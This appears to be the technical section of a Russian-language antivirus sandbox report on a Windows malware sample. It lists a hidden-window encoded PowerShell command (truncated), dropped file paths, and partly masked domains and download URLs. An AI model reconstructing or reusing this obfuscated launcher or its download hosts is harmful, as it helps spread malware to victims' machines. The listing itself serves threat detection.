Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABCADkAMQBtAHUAMAA3AD0AKAAnAFAAJwArACcAMwBpACcAKwAoACcAMQA2AG0AJwArACcAcQAnACkAKQA7AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAUgBQAFIAbw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %TEMP%\1155827.cvr
- %HOMEPATH%\y5qq77y\u0aqzin\bthq___49.exe
- 'sb###tmonte.com':443
- 'sb###tmonte.com':80
- 'du##on.ir':80
- 'st###postar.com':443
- 'pi#####oryteller.com':443
- 'ti#####gdaojituan.com':80
- 'ti#####gdaojituan.com':443
- 'nb##.xyz':80
- http://www.ku####bharath.com/wp-content/WsD/
- http://www.ku####bharath.com/wp-content/WsD/1
- http://du##on.ir/support/8USM0hcA4/
- http://www.ti#####gdaojituan.com/wp-includes/JWocY/
- http://nb##.xyz/home/sIBOFci6/
- 'st###postar.com':443
- 'ti#####gdaojituan.com':443
- DNS ASK sb###tmonte.com
- DNS ASK ku####bharath.com
- DNS ASK du##on.ir
- DNS ASK st###postar.com
- DNS ASK pi#####oryteller.com
- DNS ASK ti#####gdaojituan.com
- DNS ASK nb##.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABCADkAMQBtAHUAMAA3AD0AKAAnAFAAJwArACcAMwBpACcAKwAoACcAMQA2AG0AJwArACcAcQAnACkAKQA7AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAUgBQAFIAbw...' (со скрытым окном)